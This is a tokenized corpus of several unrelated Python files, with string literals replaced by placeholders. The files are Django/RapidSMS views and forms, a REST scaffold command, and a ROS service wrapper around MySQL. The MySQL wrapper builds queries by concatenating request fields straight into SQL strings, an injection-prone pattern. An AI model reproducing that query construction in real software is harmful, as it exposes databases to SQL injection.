) <EOL> cache . set ( '<STR_LIT>' , movies , timeout = <NUM_LIT:7> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> return movies <EOL> def find_movies ( ) : <EOL> directory = current_app . config [ '<STR_LIT>' ] <EOL> extensions = current_app . config [ '<STR_LIT>' ] <EOL> movies = { } <EOL> rootPathLen = len ( directory ) <EOL> for root , dirnames , filenames in os . walk ( directory , followlinks = True ) : <EOL> for filename in filenames : <EOL> u_filename = unicode ( filename , '<STR_LIT:utf-8>' ) <EOL> u_root = unicode ( root , '<STR_LIT:utf-8>' ) <EOL> if u_filename . lower ( ) . endswith ( extensions ) : <EOL> firstChar = u_filename [ <NUM_LIT:0> ] . upper ( ) <EOL> if not firstChar in movies . keys ( ) : <EOL> movies [ firstChar ] = [ ] <EOL> movies [ firstChar ] . append ( { <EOL> '<STR_LIT:path>' : os . path . join ( u_root , u_filename ) [ rootPathLen : ] , <EOL> '<STR_LIT:name>' : u_filename <EOL> } ) <EOL> return movies </s>
<s> from . outgoing import OutgoingMessage <EOL> class ErrorMessage ( OutgoingMessage ) : <EOL> """<STR_LIT:U+0020>""" <EOL> pass </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> license = "<STR_LIT>" , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> scripts = [ "<STR_LIT>" ] , <EOL> package_dir = { "<STR_LIT>" : "<STR_LIT>" } , <EOL> packages = find_packages ( "<STR_LIT>" , exclude = [ '<STR_LIT>' ] ) , <EOL> include_package_data = True , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> maintainer = "<STR_LIT>" , <EOL> maintainer_email = "<STR_LIT>" , <EOL> description = "<STR_LIT>" , <EOL> url = "<STR_LIT>" <EOL> ) </s>
<s> import logging <EOL> import pprint <EOL> from django . http import HttpResponse , HttpResponseBadRequest <EOL> from django . views . generic . edit import CreateView <EOL> from rapidsms . backends . kannel . models import DeliveryReport <EOL> from rapidsms . backends . kannel . forms import KannelForm <EOL> from rapidsms . backends . http . views import BaseHttpBackendView <EOL> logger = logging . getLogger ( __name__ ) <EOL> class KannelBackendView ( BaseHttpBackendView ) : <EOL> """<STR_LIT>""" <EOL> http_method_names = [ '<STR_LIT>' ] <EOL> form_class = KannelForm <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . post ( * args , ** kwargs ) <EOL> def get_form_kwargs ( self ) : <EOL> kwargs = super ( KannelBackendView , self ) . get_form_kwargs ( ) <EOL> kwargs [ '<STR_LIT:data>' ] = self . request . GET <EOL> return kwargs <EOL> def form_valid ( self , form ) : <EOL> super ( KannelBackendView , self ) . form_valid ( form ) <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> class DeliveryReportView ( CreateView ) : <EOL> model = DeliveryReport <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , ) <EOL> http_method_names = [ '<STR_LIT>' ] <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . object = None <EOL> return self . post ( * args , ** kwargs ) <EOL> def get_form_kwargs ( self ) : <EOL> kwargs = super ( DeliveryReportView , self ) . get_form_kwargs ( ) <EOL> kwargs [ '<STR_LIT:data>' ] = self . request . GET <EOL> return kwargs <EOL> def form_valid ( self , form ) : <EOL> self . object = form . save ( ) <EOL> return HttpResponse ( '<STR_LIT>' ) <EOL> def form_invalid ( self , form ) : <EOL> """<STR_LIT>""" <EOL> logger . error ( "<STR_LIT>" , self . request . method ) <EOL> logger . error ( pprint . pformat ( form . data ) ) <EOL> errors = dict ( ( k , v [ <NUM_LIT:0> ] ) for k , v in form . errors . items ( ) ) <EOL> logger . error ( str ( errors ) ) <EOL> if form . non_field_errors ( ) : <EOL> logger . error ( form . non_field_errors ( ) ) <EOL> return HttpResponseBadRequest ( '<STR_LIT>' ) </s>
<s> from django import forms <EOL> from django . core . exceptions import ValidationError <EOL> class SmallFileField ( forms . FileField ) : <EOL> def widget_attrs ( self , widget ) : <EOL> return { "<STR_LIT:size>" : <NUM_LIT:10> } <EOL> class MessageForm ( forms . Form ) : <EOL> identity = forms . CharField ( <EOL> label = "<STR_LIT>" , <EOL> max_length = <NUM_LIT:100> , <EOL> help_text = "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> text = forms . CharField ( <EOL> label = "<STR_LIT>" , <EOL> required = False , <EOL> widget = forms . widgets . Textarea ( { <EOL> "<STR_LIT>" : <NUM_LIT:30> , <EOL> "<STR_LIT>" : <NUM_LIT:4> } ) ) <EOL> bulk = SmallFileField ( <EOL> label = "<STR_LIT>" , <EOL> required = False , <EOL> help_text = "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> def clean_identity ( self ) : <EOL> if '<STR_LIT>' in self . cleaned_data : <EOL> identity = self . cleaned_data [ '<STR_LIT>' ] . strip ( ) <EOL> if not identity . isnumeric ( ) : <EOL> raise ValidationError ( "<STR_LIT>" ) <EOL> return identity </s>
<s> from django . conf . urls import url <EOL> from . import views <EOL> urlpatterns = ( <EOL> url ( r'<STR_LIT>' , views . message_log , name = "<STR_LIT>" ) , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( help_text = '<STR_LIT>' , max_length = <NUM_LIT:6> , blank = True ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from django import template <EOL> register = template . Library ( ) <EOL> @ register . inclusion_tag ( '<STR_LIT>' ) <EOL> def render_form ( form ) : <EOL> return { "<STR_LIT>" : form } </s>
<s> from optparse import make_option <EOL> from django . core . management . base import BaseCommand , CommandError <EOL> try : <EOL> from django . apps import apps <EOL> get_app = apps . get_app_config <EOL> from django . apps . registry import AppConfig <EOL> get_models = AppConfig . get_models <EOL> except ImportError : <EOL> from django . db . models . loading import get_app , get_models <EOL> serializers = """<STR_LIT>""" <EOL> serializer_class_def = """<STR_LIT>""" <EOL> viewsets = """<STR_LIT>""" <EOL> viewset_class_def = """<STR_LIT>""" <EOL> urls = """<STR_LIT>""" <EOL> router_def = "<STR_LIT>" <EOL> class Command ( BaseCommand ) : <EOL> args = '<STR_LIT>' <EOL> help = '<STR_LIT>' <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) , <EOL> make_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> dest = '<STR_LIT>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) , <EOL> ) <EOL> def handle ( self , * args , ** options ) : <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> raise CommandError ( '<STR_LIT>' ) <EOL> app_name = args [ <NUM_LIT:0> ] <EOL> app = get_app ( app_name ) <EOL> model_names = [ model . __name__ for model in get_models ( app ) ] <EOL> if options [ '<STR_LIT>' ] : <EOL> serializer_names = [ model_name + '<STR_LIT>' for model_name in model_names ] <EOL> class_defs = [ <EOL> viewset_class_def % { <EOL> '<STR_LIT>' : name , <EOL> } <EOL> for name in model_names <EOL> ] <EOL> print ( viewsets % { <EOL> '<STR_LIT>' : '<STR_LIT>' + app_name + '<STR_LIT>' + ( '<STR_LIT:U+002CU+0020>' . join ( model_names ) ) , <EOL> '<STR_LIT>' : '<STR_LIT>' + app_name + '<STR_LIT>' + ( '<STR_LIT:U+002CU+0020>' . join ( serializer_names ) ) , <EOL> '<STR_LIT>' : '<STR_LIT>' . join ( class_defs ) , <EOL> } ) <EOL> elif options [ '<STR_LIT>' ] : <EOL> view_names = [ model_name + '<STR_LIT>' for model_name in model_names ] <EOL> router_defs = [ <EOL> router_def % { <EOL> '<STR_LIT>' : model_name . lower ( ) + '<STR_LIT:s>' , <EOL> '<STR_LIT>' : model_name , <EOL> } <EOL> for model_name in model_names <EOL> ] <EOL> print ( urls % { <EOL> '<STR_LIT>' : '<STR_LIT>' + app_name + '<STR_LIT>' + ( '<STR_LIT:U+002CU+0020>' . join ( view_names ) ) , <EOL> '<STR_LIT>' : '<STR_LIT>' . join ( router_defs ) , <EOL> } ) <EOL> else : <EOL> class_defs = [ <EOL> serializer_class_def % { <EOL> '<STR_LIT>' : name , <EOL> } <EOL> for name in model_names <EOL> ] <EOL> print ( serializers % { <EOL> '<STR_LIT>' : '<STR_LIT>' + app_name + '<STR_LIT>' + ( '<STR_LIT:U+002CU+0020>' . join ( model_names ) ) , <EOL> '<STR_LIT>' : '<STR_LIT>' . join ( class_defs ) , <EOL> } ) </s>
<s> import rospy <EOL> import MySQLdb as mdb <EOL> import sys <EOL> from rapp_platform_ros_communications . srv import ( <EOL> fetchDataSrv , <EOL> fetchDataSrvResponse , <EOL> writeDataSrv , <EOL> writeDataSrvResponse , <EOL> deleteDataSrv , <EOL> deleteDataSrvResponse , <EOL> updateDataSrv , <EOL> updateDataSrvResponse , <EOL> whatRappsCanRunSrv , <EOL> whatRappsCanRunSrvResponse <EOL> ) <EOL> from rapp_platform_ros_communications . msg import ( <EOL> StringArrayMsg <EOL> ) <EOL> from std_msgs . msg import ( <EOL> String <EOL> ) <EOL> class MySQLdbWrapper : <EOL> def __init__ ( self ) : <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblUserFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . tblUserWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblUserDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblUserUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblModelFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . tblModelWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblModelDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblModelUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblRappFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . tblRappWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblRappDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblRappUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblRobotFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . tblRobotWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblRobotDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblRobotUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblAppsRobotsFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . tblAppsRobotsWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblAppsRobotsDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblAppsRobotsUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . tblUsersOntologyInstancesFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , writeDataSrv , self . tblUsersOntologyInstancesWriteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , deleteDataSrv , self . tblUsersOntologyInstancesDeleteDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , updateDataSrv , self . tblUsersOntologyInstancesUpdateDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , fetchDataSrv , self . viewUsersRobotsAppsFetchDataHandler ) <EOL> self . serv_topic = rospy . get_param ( "<STR_LIT>" ) <EOL> if ( not self . serv_topic ) : <EOL> rospy . logerror ( "<STR_LIT>" ) <EOL> self . serv = rospy . Service ( self . serv_topic , whatRappsCanRunSrv , self . whatRappsCanRunDataHandler ) <EOL> def writeData ( self , req , tblName ) : <EOL> try : <EOL> res = writeDataSrvResponse ( ) <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> returncols = self . constructCommaColumns ( req . req_cols ) <EOL> if ( len ( returncols ) > <NUM_LIT:1> ) : <EOL> returncols = "<STR_LIT:(>" + returncols + "<STR_LIT:)>" <EOL> print returncols <EOL> values = "<STR_LIT>" <EOL> for i in range ( len ( req . req_data ) ) : <EOL> if ( i == <NUM_LIT:0> ) : <EOL> values = values + "<STR_LIT:(>" + self . constructCommaColumns ( req . req_data [ i ] . s ) + "<STR_LIT:)>" <EOL> else : <EOL> values = values + "<STR_LIT>" + self . constructCommaColumns ( req . req_data [ i ] . s ) + "<STR_LIT:)>" <EOL> query = "<STR_LIT>" + tblName + "<STR_LIT:U+0020>" + returncols + "<STR_LIT>" + values <EOL> cur . execute ( "<STR_LIT>" + tblName + "<STR_LIT>" ) <EOL> cur . execute ( query ) <EOL> cur . execute ( "<STR_LIT>" ) <EOL> res . success . data = True <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> except mdb . Error , e : <EOL> res . trace . append ( ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> res . success . data = False <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> return res <EOL> def deleteData ( self , req , tblName ) : <EOL> try : <EOL> res = deleteDataSrvResponse ( ) <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> where = self . constructAndQuery ( req . where_data ) <EOL> query = "<STR_LIT>" + tblName + where <EOL> cur . execute ( "<STR_LIT>" + tblName + "<STR_LIT>" ) <EOL> cur . execute ( query ) <EOL> cur . execute ( "<STR_LIT>" ) <EOL> res . success . data = True <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> except mdb . Error , e : <EOL> res . trace . append ( ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> res . success . data = False <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> return res <EOL> def updateData ( self , req , tblName ) : <EOL> try : <EOL> res = updateDataSrvResponse ( ) <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> returncols = self . constructCommaColumns ( req . set_cols ) <EOL> where = self . constructAndQuery ( req . where_data ) <EOL> query = "<STR_LIT>" + tblName + "<STR_LIT>" + returncols + where <EOL> print query <EOL> cur . execute ( "<STR_LIT>" + tblName + "<STR_LIT>" ) <EOL> cur . execute ( query ) <EOL> cur . execute ( "<STR_LIT>" ) <EOL> res . success . data = True <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> except mdb . Error , e : <EOL> res . trace . append ( ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> res . success . data = False <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> return res <EOL> def fetchData ( self , req , tblName ) : <EOL> try : <EOL> res = fetchDataSrvResponse ( ) <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> returncols = self . constructCommaColumns ( req . req_cols ) <EOL> where = self . constructAndQuery ( req . where_data ) <EOL> query = "<STR_LIT>" + returncols + "<STR_LIT>" + tblName + where <EOL> cur . execute ( query ) <EOL> result_set = cur . fetchall ( ) <EOL> for i in range ( len ( result_set ) ) : <EOL> line = StringArrayMsg ( ) <EOL> for j in range ( len ( result_set [ i ] ) ) : <EOL> temp_s = String ( result_set [ i ] [ j ] ) <EOL> line . s . append ( ( str ( result_set [ i ] [ j ] ) ) ) <EOL> res . res_data . append ( line ) <EOL> con . close ( ) <EOL> if ( returncols == "<STR_LIT:*>" ) : <EOL> res . res_cols = self . getTableColumnNames ( tblName ) <EOL> else : <EOL> res . res_cols = req . req_cols <EOL> res . success . data = True <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> except mdb . Error , e : <EOL> res . trace . append ( ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> res . success . data = False <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> return res <EOL> def whatRappsCanRun ( self , req , tblName ) : <EOL> try : <EOL> res = whatRappsCanRunSrvResponse ( ) <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> query = "<STR_LIT>" + req . model_id + "<STR_LIT>" + req . core_agent_version + "<STR_LIT:'>" ; <EOL> cur . execute ( query ) <EOL> result_set = cur . fetchall ( ) <EOL> for i in range ( len ( result_set ) ) : <EOL> line = StringArrayMsg ( ) <EOL> for j in range ( len ( result_set [ i ] ) ) : <EOL> temp_s = String ( result_set [ i ] [ j ] ) <EOL> line . s . append ( ( str ( result_set [ i ] [ j ] ) ) ) <EOL> res . res_data . append ( line ) <EOL> con . close ( ) <EOL> res . success . data = True <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> except mdb . Error , e : <EOL> res . trace . append ( ( "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) ) ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> except IndexError : <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> res . success . data = False <EOL> print "<STR_LIT>" <EOL> except IOError : <EOL> print "<STR_LIT>" <EOL> res . success . data = False <EOL> res . trace . append ( "<STR_LIT>" ) <EOL> return res <EOL> def constructCommaColumns ( self , cols ) : <EOL> if ( len ( cols ) < <NUM_LIT:1> ) : <EOL> return "<STR_LIT>" <EOL> elif ( cols [ <NUM_LIT:0> ] == "<STR_LIT:*>" ) : <EOL> return "<STR_LIT:*>" <EOL> else : <EOL> returncols = "<STR_LIT>" <EOL> for i in range ( len ( cols ) ) : <EOL> if i == <NUM_LIT:0> : <EOL> returncols = returncols + cols [ i ] <EOL> else : <EOL> returncols = returncols + "<STR_LIT:U+002C>" + cols [ i ] <EOL> return returncols <EOL> def constructAndQuery ( self , cols ) : <EOL> returnquery = "<STR_LIT>" <EOL> if ( len ( cols ) == <NUM_LIT:0> ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> for i in range ( len ( cols ) ) : <EOL> if i == <NUM_LIT:0> : <EOL> returnquery = returnquery + cols [ i ] . s [ <NUM_LIT:0> ] + "<STR_LIT>" + cols [ i ] . s [ <NUM_LIT:1> ] + "<STR_LIT>" <EOL> else : <EOL> returnquery = returnquery + "<STR_LIT>" + cols [ i ] . s [ <NUM_LIT:0> ] + "<STR_LIT>" + cols [ i ] . s [ <NUM_LIT:1> ] + "<STR_LIT>" <EOL> returnquery = "<STR_LIT>" + returnquery <EOL> return returnquery <EOL> def getTableColumnNames ( self , tblName ) : <EOL> db_username , db_password = self . getLogin ( ) <EOL> try : <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) ; <EOL> cur = con . cursor ( ) <EOL> cur . execute ( "<STR_LIT>" + tblName ) <EOL> result_set = cur . fetchall ( ) <EOL> Columns = [ ] <EOL> for row in result_set : <EOL> Columns = Columns + [ String ( str ( row [ <NUM_LIT:0> ] ) ) ] <EOL> return Columns <EOL> except mdb . Error , e : <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> def getLogin ( self ) : <EOL> fh = open ( "<STR_LIT>" , "<STR_LIT:r>" ) <EOL> db_username = fh . readline ( ) <EOL> db_username = db_username . split ( ) [ <NUM_LIT:0> ] <EOL> db_password = fh . readline ( ) <EOL> db_password = db_password . split ( ) [ <NUM_LIT:0> ] <EOL> return db_username , db_password <EOL> def checkConnection ( self ) : <EOL> try : <EOL> db_username , db_password = self . getLogin ( ) <EOL> con = mdb . connect ( '<STR_LIT:localhost>' , db_username , db_password , '<STR_LIT>' ) <EOL> cur = con . cursor ( ) <EOL> cur . execute ( "<STR_LIT>" ) <EOL> ver = cur . fetchone ( ) <EOL> print "<STR_LIT>" % ver <EOL> con . close ( ) <EOL> except mdb . Error , e : <EOL> print "<STR_LIT>" % ( e . args [ <NUM_LIT:0> ] , e . args [ <NUM_LIT:1> ] ) <EOL> def tblUserFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUserWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUserDeleteDataHandler ( self , req ) : <EOL> res = deleteDataSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUserUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblModelFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblModelWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblModelDeleteDataHandler ( self , req ) : <EOL> res = deleteDataSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblModelUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRappFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRappWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRappDeleteDataHandler ( self , req ) : <EOL> res = deleteDataSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRappUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRobotFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRobotWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRobotDeleteDataHandler ( self , req ) : <EOL> res = deleteDataSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblRobotUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblAppsRobotsFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblAppsRobotsWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) 